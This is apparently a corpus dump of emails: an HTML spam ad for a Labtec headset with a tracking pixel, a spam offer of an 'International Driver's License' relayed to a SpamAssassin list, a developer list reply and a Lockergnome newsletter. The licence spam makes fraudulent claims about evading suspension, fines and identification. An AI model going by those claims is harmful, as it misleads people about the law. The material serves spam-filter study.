                   &lt;td height="72" colspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_11.jpg" width="139" height="72" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_12.gif" width="113" height="72" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
                   &lt;td colspan="4"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_13.gif" width="500" height="30" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
             &lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width="501" border="0" cellspacing="0"&gt;
         &lt;tr&gt; 
           &lt;td colspan="3" height="2"&gt; 
             &lt;table width="100" border="0" cellspacing="0"&gt;
               &lt;tr&gt; 
                 &lt;td height="46"&gt; 
                   &lt;table width="500" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#285179"&gt;
                     &lt;tr align="center" bgcolor="#336699"&gt; 
                       &lt;td colspan="6"&gt;&lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="4"&gt;Compare 
                         and Save&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="45" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;Price&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;S&amp;amp;H&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;Total&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;You 
                           Save&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;See 
                           for yourself&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF" class="plain"&gt;AMAZON&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$29.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$4.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$34.98&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;70%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.amazon.com/exec/obidos/redirect?tag=shippingonlyc-20&amp;path=tg/detail/-/B000052WMC/qid=1031163953/sr=8-1" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;span class="plain"&gt;CDW&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$29.21&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$7.53&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;$36.74&lt;span class="plain"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;69%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.cdw.com/shop/products/default.asp?edc=262511" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;span class="plain"&gt;Office 
                           Depot &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$28.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$5.95&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$34.94&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;69%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://click.linksynergy.com/fs-bin/click?id=bmFP6pVHdo4&amp;offerid=27778.60640382&amp;type=10&amp;subid=" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;span class="plain"&gt;Office 
                           Max &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$29.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$3.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;$33.98&lt;span class="plain"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;70%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://click.linksynergy.com/fs-bin/click?id=bmFP6pVHdo4&amp;offerid=32481.105637&amp;type=2&amp;subid=0" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td colspan="6" bgcolor="#336699" height="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF"&gt;&lt;b&gt;&lt;font size="1" class="tiny"&gt;* 
                         Comparisons are based on similar model from leading merchants. 
                         &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=3&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;*Microsoft 
       Windows&amp;reg; approved and certified compatible with all major voice recognition 
       software.&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" height="440"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td height="440" width="261"&gt; 
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
         &lt;tr&gt; 
           &lt;td height="310"&gt; &lt;p&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt; &lt;/font&gt;&lt;/p&gt;
             &lt;table width="280" border="0" cellpadding="0" cellspacing="0"&gt;
               &lt;tr&gt;
                 &lt;td height="365"&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;b&gt;&lt;font size="3"&gt;Unleash 
                   your PC's Multimedia power TODAY &lt;/font&gt;&lt;/b&gt;with&lt;b&gt; &lt;/b&gt;the 
                   &lt;b&gt;LABTEC&lt;/b&gt; PATENTED &lt;b&gt;NCAT2&lt;/b&gt; noise cancelling-amplification 
                   technology!&lt;br&gt;
               &lt;br&gt;
               Use your PC for long distance calls and &lt;font color="#FF0000"&gt;&lt;b&gt;SAVE 
               BIG!&lt;/b&gt;&lt;/font&gt; Activate your PC and all your programs &lt;b&gt;USING 
               YOUR VOICE&lt;/b&gt;!&lt;br&gt;
               &lt;br&gt;
               &lt;b&gt;Video Conference&lt;/b&gt; with your friends IN REAL TIME! Send &lt;b&gt;VOICE 
               EMAIL&lt;/b&gt; or Chat worldwide over the Internet, &lt;b&gt;LIVE!&lt;/b&gt; - even 
               record your voice &amp; conversations &lt;b&gt;LIKE THE PRO'S&lt;/b&gt;.&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt; This is 
                     &lt;u&gt;THE&lt;/u&gt; best headset for your PC by the undisputed industry 
                     leader,&lt;b&gt; LABTEC&lt;/b&gt; - Producing unmatched sound quality, 
                     superior to any headset you've ever owned!&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=3&gt; The ultimate 
                     in style and quality. Get yours today while they last! &lt;a href="labtecfaq.html" target="_blank"&gt;FAQ's&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;p&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;br&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
         &lt;tr&gt; 
           &lt;td height="106"&gt; 
             &lt;p align=center&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" 
             size=2 color="red"&gt;&lt;span class=plain&gt;&lt;b&gt;You can't get a better Headset 
               -- at a better price -- anywhere else!&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;span class=plain&gt;&lt;font 
             face="Verdana, Arial, Helvetica, sans-serif" size=2&gt; &lt;br&gt;
               You pay only: &lt;b&gt;$8.99&lt;br&gt;
               &lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;a 
             href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img 
             height=33 src="http://promote.thankugift.com/images/434x355-pearl-8_04.gif" width=145 
             border=0&gt;&lt;/a&gt;&lt;/p&gt;
             &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 	&lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=389099\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=389099\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/body&gt;&lt;/html&gt;&lt;img src="http://www.330w.com/open/open.php?eid=zzzz@example.com&amp;oid=Special_Offer-09192002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">" &lt;nsfsae@alltel.net&gt;
 Content-Type: text/plain; charset="us-ascii";format=flowed
 Content-Transfer-Encoding: 7bit
 Subject: [SA] Drive everywhere
 Sender: spamassassin-sightings-admin@example.sourceforge.net
 Errors-To: spamassassin-sightings-admin@example.sourceforge.net
 X-BeenThere: spamassassin-sightings@example.sourceforge.net
 X-Mailman-Version: 2.0.9-sf.net
 Precedence: bulk
 List-Help: &lt;mailto:spamassassin-sightings-request@example.sourceforge.net?subject=help&gt;
 List-Post: &lt;mailto:spamassassin-sightings@example.sourceforge.net&gt;
 List-Subscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-sightings&gt;,
 	&lt;mailto:spamassassin-sightings-request@lists.sourceforge.net?subject=subscribe&gt;
 List-Id: &lt;spamassassin-sightings.example.sourceforge.net&gt;
 List-Unsubscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-sightings&gt;,
 	&lt;mailto:spamassassin-sightings-request@lists.sourceforge.net?subject=unsubscribe&gt;
 List-Archive: &lt;http://www.geocrawler.com/redir-sf.php3?list=spamassassin-sightings&gt;
 X-Original-Date: Mon, 10 Jun 2002 09:36:57 +0900
 Date: Mon, 10 Jun 2002 09:36:57 +0900
 INTERNATIONAL DRIVER'S LICENSE
 Need a new driver's license?
 Too many points or other trouble?
 Want a license that can never be suspended
 or revoked?
 Want an ID for nightclubs or hotel check-in?
 Avoid tickets, fines, and mandatory driver's
 education.
 Protect your privacy, and hide your identity.
 The United Nations gave you the privilege to
 drive freely throughout the world! (Convention
 on International Road Traffic of September 19,
 1949 &amp; World Court Decision, The Hague,
 Netherlands, January 21, 1958)
 Take advantage of your rights. Order a valid
 International Driver's License that can never
 be suspended or revoked.
 Confidentiality assured.
 CALL NOW!!!
 1-770-908-3949 
 We await your call seven days a week, 24 hours a day,
 including Sundays and holidays.
 spel
 _______________________________________________________________
 Don't miss the 2002 Sprint PCS Application Developer's Conference
 August 25-28 in Las Vegas - http://devcon.sprintpcs.com/adp/index.cfm?source=osdntextlink
 _______________________________________________
 Spamassassin-Sightings mailing list
 Spamassassin-Sightings@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-sightings
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] BIG CHANGE coming up in cvs
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Tuesday, August 6, 2002, at 10:19  AM, Justin Mason wrote:
 &gt;
 &gt; "Craig R.Hughes" said:
 &gt;
 &gt;&gt; Excellent.  After that, I'd suggest we work on stabilizing (ie
 &gt;&gt; no new features) for a bit, and getting 2.40 released.  I think
 &gt;&gt; we're in reasonably good shape now with 2.40 (plus or minus some
 &gt;&gt; build issues occasionally creeping in), and Razor2 is starting
 &gt;&gt; to get a little less flakey (minus one or two server issues in
 &gt;&gt; the last few days).
 &gt;
 &gt; Yeah, I agree.  Although note: I'd like to see the proposal to use
 &gt; Received IPs in the AWL, get into 2.40 too.  That's being actively
 &gt; exploited right now.
 Yeah, AWL IPs is a good thing for 2.40
 &gt; Razor2 is definitely getting solid, and getting some good hits too!
 When it works, yeah.  But it's so flakey I have to turn it off 
 so that my mail can be guaranteed to actually get through in a 
 decent timeframe.
 C
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020712.html"&gt;
       http://www.lockergnome.com/issues/daily/20020712.html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&lt;/style&gt;&lt;title&gt;20020712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07.12.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font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My mom just notified me of my aunt Theresa's death. She was my
 father's older sister, though I only knew her through a few e-mail
 exchanges and a couple of brief encounters as a child. This news
 came hours after I received ANOTHER bit of disturbing news:
 "Please tell Chris that one of his first fans died last weekend of
 a heart attack at home." I first met Jon Snyder at an Apple user's
 group meeting a couple of years ago; to me, he always looked like
 a beefier Robert Beltran. Death is something we all must deal
 with, but you never seem to be prepared for it when someone
 actually dies. A few months ago, Aunt Theresa sent word that she
 had seen my show. It was good to know that even though we hadn't
 interacted much over the past few years, she was still able to see
 me on TV. And even though you didn't know him, you're closer to
 Jon than you realize. Witness this message he sent to his boss a
 few months ago:
 &lt;p&gt;
 &lt;I&gt;"I evangelized for months last year for having our company at
 the first of these consumer computer conferences in Des Moines
 last October, but got shot down. The conference was a hit despite
 being postponed by 9/11, and having to move the venue at the last
 minute. I know... I was there. So, I'm starting all over again
 being 'pushy' about our presence at this event in August of this
 year. Chris Pirillo, whose Des Moines-based commercial email
 publishing group 'Lockergnome' puts this conference together, is a
 friend of mine. He was the 'kid' hired by TechTV to host their
 Call for Help daily TV program in SF starting last fall. If you
 get the Dish network or Mediacom cable you can catch his show. I
 have my DishPlayer set up to record his show on a daily basis.
 It's VERY well done, as is TechTV as a whole."&lt;/I&gt;
 &lt;p&gt;
 I returned from speaking to another &lt;a href="http://www.dvpc.org/"&gt;user group&lt;/a&gt; the other night and
 found that approximately 100 new GnomeTomes had been ordered.
 Sweet! When I started looking closer at the numbers, I realized
 that Jake was offering his &lt;a href="http://www.gnometomes.com/tome/cat_audio.html"&gt;Converting
 Vinyl LPs to CD&lt;/a&gt; eBook for free - and that's all anybody was
 taking. No, seriously - five hundred orders later, and 99% of them
 were just for that particular title. Now, while I don't have a
 problem with Jake's offer, I do want to encourage you to check out
 the non-free titles (and if you've already looked, please
 &lt;a href="http://www.gnometomes.com/"&gt;look again&lt;/a&gt;). A lot of blood,
 sweat, and tears went into them - and they're just as helpful. In
 fact, Jake's also written one for &lt;A HREF="http://www.gnometomes.com/tome/001924.html"&gt;OS X&lt;/A&gt; (which
 probably wouldn't impress you if you weren't using an Apple
 machine). Although, I'm sure plenty of you use
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;Dreamweaver&lt;/a&gt;.
 Which reminds me: Jake's also now authoring our Webmaster Weekly
 newsletter. So, if you haven't read that in a while, I'd encourage
 you to give it another glance. After all, as &lt;A HREF="http://members.aol.com/voicepro/"&gt;Elwood
 Edwards&lt;/A&gt; so finely said: &lt;a href="http://www.lockergnome.com/coolstuff/youvegotlockergnome.mp3"&gt;You've
 Got Lockergnome&lt;/a&gt;! Thanks to &lt;a href="http://www.online-tonight.com/"&gt;David
 Lawrence&lt;/a&gt; for making that MP3 a reality. El can make one with your
 name, too. And yes, that's the AOL guy.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&lt;B&gt;VLINK v0.6.8.0 [257k] W9x FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.vxtech.org/"&gt;http://www.vxtech.org/&lt;/A&gt;
 &lt;P&gt;
 {Desktop link manager} Nothing gets you there faster than a link.
 I mean, imagine if while you're surfing, you had to stop and type
 in a URL every time you wanted to move to a new page. Simply
 unacceptable. So why not have that convenience when working with
 other files? This application gives you the option of opening or
 running any file or program you desire via links. You can also
 shut down your computer or disable your screensaver through this
 program. &amp;quot;No installer is required for VLink - it will not change
 any of your registry settings or other Windows settings; simply
 extract the files PowerLink.dll and VLink.exe to a directory and
 run it.&amp;quot;
 &lt;p&gt;&lt;br&gt;
 &lt;B&gt;GhiaTracker v1.5 [370k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://homepage.mac.com/karmannghia/ghiatracker/"&gt;http://homepage.mac.com/karmannghia/ghiatracker/&lt;/A&gt;
 &lt;P&gt;
 {Learn about your Ghia} Gearheads, motorheads, call them whatever
 you will, but I've never been part of their ranks. Not that I
 don't like cars, mind you; I find them much more useful than pogo
 sticks. If you happen to own a little vehicle known as the Karmann
 Ghia, you should drive on over and download this program. Click on
 any year between 1956 (the year it went into production) and 1974
 to get a brief synopsis of the car and its changes for that year.
 You can also get other specifications such as torque, horsepower,
 compression, etc. Even if you're not &amp;quot;into&amp;quot; cars, check this out.
 This program was created for use on the Mac, but a Windows version
 is also available.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&lt;B&gt;WebTV Viewer v2.6 [6.8M] W9x FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://developer.msntv.com/tools/viewer/"&gt;http://developer.msntv.com/tools/viewer/&lt;/A&gt;
 &lt;P&gt;
 &amp;quot;Preview your sites on WebTV without leaving your PC! The WebTV
 Viewer simulates WebTV on your system. Read the online Viewer
 Installation Guide to find out more on how to use this software.
 Important: the PC version of the WebTV Viewer (2.6) reflects all
 of the features of the most recent upgrade from Spring 2001. Note:
 The Viewer is similar, but not identical, to a real WebTV system.
 The WebTV Viewer program is currently beta-level software on both
 Windows and Macintosh. This means that it has not been completely
 tested and debugged. The WebTV Viewer is like a WebTV browser
 because: it changes page layout by compressing page width and
 enlarging text; and it supports HTML, JavaScript, as well as other
 Internet standards in the same way. The WebTV Viewer is not like a
 WebTV browser because: your computer monitor has a higher
 resolution than a television screen, and displays color better;
 and the Viewer does not support email or audio, while the WebTV
 browser does.&amp;quot;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size="1"&gt;&lt;B&gt;Full PDF Books&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001829.html"&gt;Poor Richard's Web&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001827.html"&gt;Internet Promotions&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001804.html"&gt;E-Mail Publishing&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001830.html"&gt;Web Site Makeover&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001803.html"&gt;Websites Made Easy&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001825.html"&gt;Online Communities&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001826.html"&gt;Home Networking&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001828.html"&gt;Internet Recruiting&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001824.html"&gt;Online Branding&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;B&gt;The Evidence is Against You&lt;/b&gt;
     &lt;br&gt;Scribbled by Jim Girard
 &lt;P&gt;
 Every time some new technology has expanded free access to popular
 music, starting with radio broadcasts of recorded songs in the
 1930s, the recording industry has fought it - claiming that it
 would cost them money. And every time, it has resulted in
 increased sales. The best-known example, of course, was the
 advances in tape cassette technology in the 60s and 70s, including
 Dolby sound technology. As with MP3, this technology was opposed
 by the music industry as different from previous such
 developments, because it made it possible for ordinary people to
 create their own copies at near-professional quality. The actual
 result was the creation of a whole new profit center for the music
 industry - pre-recorded cassette tapes - which actually became
 more popular than vinyl for a while (before the advent of CD
 technology).
 &lt;P&gt;
 The thing is, the music industry is well aware of this effect -
  and they are not really aiming to stop the private exchange of
 songs in MP3 format. If that were their goal, they'd be
 instituting widespread, aggressive legal actions against all the
 server-centered nodes (as they did against all radio stations
 playing their music in the 30s, when they really thought the
 phenomenon was going to wipe them out). Instead, they have focused
 on the best-known services - first Napster, then Morpheus, KaZaA,
 and most recently, Audiogalaxy. Even in those cases, they've
 limited their legal challenges to things they know they can win -
  and they've avoided actual court trials whenever possible (to
 avoid the possibility of setting some damaging precedent).
 &lt;P&gt;
 The point that seems to escape a lot of people is that copyright
 is not a property in the same sense as most of the things we think
 of as property. One key difference is that if you don't defend it,
 you lose it. If you left your car sitting in the driveway, with
 the window open and the keys in the ignition, and somebody drove
 away in it, that would still be theft - and you'd still be
 entitled to get your car back. Not so with copyright. If you are
 aware of infringement and you do nothing to try to stop it, you
 are voluntarily allowing it to enter the public domain. It's for
 the same reason that big companies insist that newspapers put a
 copyright or trademark symbol after the names of their products
 whenever they're mentioned, and not use words like &amp;quot;Coke&amp;quot; or
 &amp;quot;Kleenex&amp;quot; as generic terms. They don't really expect everybody to
 do what they say - and they're well aware that having the name of
 one's product become the generic term for a product is actually a
 great marketing boon. But if they DON'T do that, someone at some
 point could start using the word on their own product, arguing
 that it is in the public domain.
 &lt;P&gt;
 The efforts of the music industry are not aimed at actually
 stopping the exchange of music between individuals - which they
 know from long experience, increases their sales because most of
 the people who normally buy the music aren't really satisfied with
 near-perfect copies. For most of them, the learning curve and the
 cost in time of creating those copies themselves outweighs the
 cost of simply buying the CD. Most of the outright piracy is
 committed by people who wouldn't have bought the music in the
 first place. What the music industry is doing is clearly aimed at
 establishing a public record of their efforts to defend copyright,
 in the broadest, most public way; to prevent anyone from making a
 legal claim that the stuff they own has entered the public domain.
 The thing they're really worried about, in terms of profits, is
 the change in the marketing model. Even legitimate online music
 commerce threatens the album format, with its traditional mix of a
 few good songs and a bunch of others most people wouldn't pay for
 if they were buying the stuff song by song. The problem is how to
 make as much money on a per-song basis - and, at the moment, it
 requires charging far more for an individual song that most people
 are willing to pay.
 &lt;P&gt;
 At any rate, copyright is actually a fairly complex matter of
 civil law, with a good deal of history behind it - dating back to
 the Renaissance. The strategies music companies use are clearly
 directed to realities and necessities, in light of history and
 case law. They have also done a great PR job, convincing the most
 technically knowledgeable people on the Internet that it is a
